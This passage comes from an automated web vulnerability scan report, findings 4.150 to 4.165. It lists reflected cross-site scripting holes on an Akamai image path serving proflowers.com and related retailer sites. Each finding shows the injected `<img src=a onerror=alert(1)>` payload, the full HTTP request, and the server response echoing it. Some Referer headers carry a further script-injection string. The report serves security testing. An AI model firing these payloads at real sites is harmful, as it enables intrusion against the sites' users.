Content-Type: text/plain
Content-Length: 112
Cache-Control: no-store
Date: Mon, 09 May 2011 12:24:07 GMT
Connection: close

Unable to find /ProvideCommerce/SNK_CKNMDAYROSE_MomFrtFlwr_MDY_11_SQ443e5<img src=a onerror=alert(1)>94aad6f4a68
4.150. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/SNK_CKNSNCKCHC_SnkAttkv2_Core_10_SQ [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/SNK_CKNSNCKCHC_SnkAttkv2_Core_10_SQ

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload d1ba3<img%20src%3da%20onerror%3dalert(1)>a60921a1341 was submitted in the REST URL parameter 9. This input was echoed as d1ba3<img src=a onerror=alert(1)>a60921a1341 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/SNK_CKNSNCKCHC_SnkAttkv2_Core_10_SQd1ba3<img%20src%3da%20onerror%3dalert(1)>a60921a1341?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=163&hei=163 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.cherrymoonfarms.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 111
Cache-Control: no-store
Date: Mon, 09 May 2011 12:23:11 GMT
Connection: close

Unable to find /ProvideCommerce/SNK_CKNSNCKCHC_SnkAttkv2_Core_10_SQd1ba3<img src=a onerror=alert(1)>a60921a1341
4.151. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/SNK_CONSSTRTTWR_GvnSpringTower_SPR_11_SQ [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/SNK_CONSSTRTTWR_GvnSpringTower_SPR_11_SQ

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload adbc9<img%20src%3da%20onerror%3dalert(1)>5310c9a9fa6 was submitted in the REST URL parameter 9. This input was echoed as adbc9<img src=a onerror=alert(1)>5310c9a9fa6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/SNK_CONSSTRTTWR_GvnSpringTower_SPR_11_SQadbc9<img%20src%3da%20onerror%3dalert(1)>5310c9a9fa6?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=163&hei=163 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.cherrymoonfarms.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 116
Cache-Control: no-store
Date: Mon, 09 May 2011 12:23:48 GMT
Connection: close

Unable to find /ProvideCommerce/SNK_CONSSTRTTWR_GvnSpringTower_SPR_11_SQadbc9<img src=a onerror=alert(1)>5310c9a9fa6
4.152. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/SNK_PUS1441_SwtTwr_EDY_11_SQ [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/SNK_PUS1441_SwtTwr_EDY_11_SQ

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 4d8aa<img%20src%3da%20onerror%3dalert(1)>3b6dc5e579c was submitted in the REST URL parameter 9. This input was echoed as 4d8aa<img src=a onerror=alert(1)>3b6dc5e579c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/SNK_PUS1441_SwtTwr_EDY_11_SQ4d8aa<img%20src%3da%20onerror%3dalert(1)>3b6dc5e579c?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=163&hei=163 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.cherrymoonfarms.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 104
Cache-Control: no-store
Date: Mon, 09 May 2011 12:24:16 GMT
Connection: close

Unable to find /ProvideCommerce/SNK_PUS1441_SwtTwr_EDY_11_SQ4d8aa<img src=a onerror=alert(1)>3b6dc5e579c
4.153. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/SUN10yellowfill_pnk11_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/SUN10yellowfill_pnk11_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload f6cb8<img%20src%3da%20onerror%3dalert(1)>ebea8158570 was submitted in the REST URL parameter 9. This input was echoed as f6cb8<img src=a onerror=alert(1)>ebea8158570 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/SUN10yellowfill_pnk11_PFf6cb8<img%20src%3da%20onerror%3dalert(1)>ebea8158570?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 100
Cache-Control: no-store
Date: Mon, 09 May 2011 12:17:13 GMT
Connection: close

Unable to find /ProvideCommerce/SUN10yellowfill_pnk11_PFf6cb8<img src=a onerror=alert(1)>ebea8158570
4.154. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/TUL15assrt_sgv09_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/TUL15assrt_sgv09_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload e6bab<img%20src%3da%20onerror%3dalert(1)>4ea615db158 was submitted in the REST URL parameter 9. This input was echoed as e6bab<img src=a onerror=alert(1)>4ea615db158 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/TUL15assrt_sgv09_PFe6bab<img%20src%3da%20onerror%3dalert(1)>4ea615db158?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 95
Cache-Control: no-store
Date: Mon, 09 May 2011 12:16:50 GMT
Connection: close

Unable to find /ProvideCommerce/TUL15assrt_sgv09_PFe6bab<img src=a onerror=alert(1)>4ea615db158
4.155. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/TUL20assrt_grn10_test_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/TUL20assrt_grn10_test_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 1c0f1<img%20src%3da%20onerror%3dalert(1)>785ef5a0184 was submitted in the REST URL parameter 9. This input was echoed as 1c0f1<img src=a onerror=alert(1)>785ef5a0184 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/TUL20assrt_grn10_test_PF1c0f1<img%20src%3da%20onerror%3dalert(1)>785ef5a0184?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 100
Cache-Control: no-store
Date: Mon, 09 May 2011 12:16:49 GMT
Connection: close

Unable to find /ProvideCommerce/TUL20assrt_grn10_test_PF1c0f1<img src=a onerror=alert(1)>785ef5a0184
4.156. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/TUL30assrt_tv11_catalog_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/TUL30assrt_tv11_catalog_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload b5317<img%20src%3da%20onerror%3dalert(1)>da90941c6d7 was submitted in the REST URL parameter 9. This input was echoed as b5317<img src=a onerror=alert(1)>da90941c6d7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/TUL30assrt_tv11_catalog_PFb5317<img%20src%3da%20onerror%3dalert(1)>da90941c6d7?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 102
Cache-Control: no-store
Date: Mon, 09 May 2011 12:17:08 GMT
Connection: close

Unable to find /ProvideCommerce/TUL30assrt_tv11_catalog_PFb5317<img src=a onerror=alert(1)>da90941c6d7
4.157. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/TUL30purple_purpletrmp11_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/TUL30purple_purpletrmp11_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 2eb13<img%20src%3da%20onerror%3dalert(1)>daf816ec27c was submitted in the REST URL parameter 9. This input was echoed as 2eb13<img src=a onerror=alert(1)>daf816ec27c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/TUL30purple_purpletrmp11_PF2eb13<img%20src%3da%20onerror%3dalert(1)>daf816ec27c?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 103
Cache-Control: no-store
Date: Mon, 09 May 2011 12:16:54 GMT
Connection: close

Unable to find /ProvideCommerce/TUL30purple_purpletrmp11_PF2eb13<img src=a onerror=alert(1)>daf816ec27c
4.158. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/TropOrgSmplrPF_l [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/TropOrgSmplrPF_l

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload bf2d8<img%20src%3da%20onerror%3dalert(1)>e597a089cde was submitted in the REST URL parameter 9. This input was echoed as bf2d8<img src=a onerror=alert(1)>e597a089cde in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/TropOrgSmplrPF_lbf2d8<img%20src%3da%20onerror%3dalert(1)>e597a089cde?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=163&hei=163 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.cherrymoonfarms.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 92
Cache-Control: no-store
Date: Mon, 09 May 2011 12:23:25 GMT
Connection: close

Unable to find /ProvideCommerce/TropOrgSmplrPF_lbf2d8<img src=a onerror=alert(1)>e597a089cde
4.159. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/WRTherbal09book_m [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/WRTherbal09book_m

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 9159b<img%20src%3da%20onerror%3dalert(1)>e6aa7594d00 was submitted in the REST URL parameter 9. This input was echoed as 9159b<img src=a onerror=alert(1)>e6aa7594d00 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/WRTherbal09book_m9159b<img%20src%3da%20onerror%3dalert(1)>e6aa7594d00?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 93
Cache-Control: no-store
Date: Mon, 09 May 2011 12:11:11 GMT
Connection: close

Unable to find /ProvideCommerce/WRTherbal09book_m9159b<img src=a onerror=alert(1)>e6aa7594d00
4.160. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/WRTlavendarluxe_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/WRTlavendarluxe_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 4e41e<img%20src%3da%20onerror%3dalert(1)>33229c41e77 was submitted in the REST URL parameter 9. This input was echoed as 4e41e<img src=a onerror=alert(1)>33229c41e77 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/WRTlavendarluxe_PF4e41e<img%20src%3da%20onerror%3dalert(1)>33229c41e77?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 94
Cache-Control: no-store
Date: Mon, 09 May 2011 12:11:11 GMT
Connection: close

Unable to find /ProvideCommerce/WRTlavendarluxe_PF4e41e<img src=a onerror=alert(1)>33229c41e77
4.161. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/WRTremembrance09_l [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/WRTremembrance09_l

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload e84a1<img%20src%3da%20onerror%3dalert(1)>2db1c5fbe55 was submitted in the REST URL parameter 9. This input was echoed as e84a1<img src=a onerror=alert(1)>2db1c5fbe55 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/WRTremembrance09_le84a1<img%20src%3da%20onerror%3dalert(1)>2db1c5fbe55?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 94
Cache-Control: no-store
Date: Mon, 09 May 2011 12:11:08 GMT
Connection: close

Unable to find /ProvideCommerce/WRTremembrance09_le84a1<img src=a onerror=alert(1)>2db1c5fbe55
4.162. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/WRTsympathy_l [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/WRTsympathy_l

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload a0a24<img%20src%3da%20onerror%3dalert(1)>c317587d015 was submitted in the REST URL parameter 9. This input was echoed as a0a24<img src=a onerror=alert(1)>c317587d015 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/WRTsympathy_la0a24<img%20src%3da%20onerror%3dalert(1)>c317587d015?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 89
Cache-Control: no-store
Date: Mon, 09 May 2011 12:11:11 GMT
Connection: close

Unable to find /ProvideCommerce/WRTsympathy_la0a24<img src=a onerror=alert(1)>c317587d015
4.163. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/accgenblue09_tn [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/accgenblue09_tn

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 57238<img%20src%3da%20onerror%3dalert(1)>343bdc9b250 was submitted in the REST URL parameter 9. This input was echoed as 57238<img src=a onerror=alert(1)>343bdc9b250 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/accgenblue09_tn57238<img%20src%3da%20onerror%3dalert(1)>343bdc9b250?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=50&hei=50 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://products.proflowers.com/flowers/Deluxe-Mothers-Day-Bouquet-30050137?trackingpgroup=HPC&tile=hmpg_carousel&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 91
Cache-Control: no-store
Date: Mon, 09 May 2011 12:09:28 GMT
Connection: close

Unable to find /ProvideCommerce/accgenblue09_tn57238<img src=a onerror=alert(1)>343bdc9b250
4.164. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/p0007703b [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/p0007703b

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 7cd4b<img%20src%3da%20onerror%3dalert(1)>1abce527698 was submitted in the REST URL parameter 9. This input was echoed as 7cd4b<img src=a onerror=alert(1)>1abce527698 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/p0007703b7cd4b<img%20src%3da%20onerror%3dalert(1)>1abce527698?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 85
Cache-Control: no-store
Date: Mon, 09 May 2011 12:24:26 GMT
Connection: close

Unable to find /ProvideCommerce/p0007703b7cd4b<img src=a onerror=alert(1)>1abce527698
4.165. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/p0074868b [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/p0074868b

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload b9a40<img%20src%3da%20onerror%3dalert(1)>618e53e1f8f was submitted in the REST URL parameter 9. This input was echoed as b9a40<img src=a onerror=alert(1)>618e53e1f8f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/p0074868bb9a40<img%20src%3da%20onerror%3dalert(1)>618e53e1f8f?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
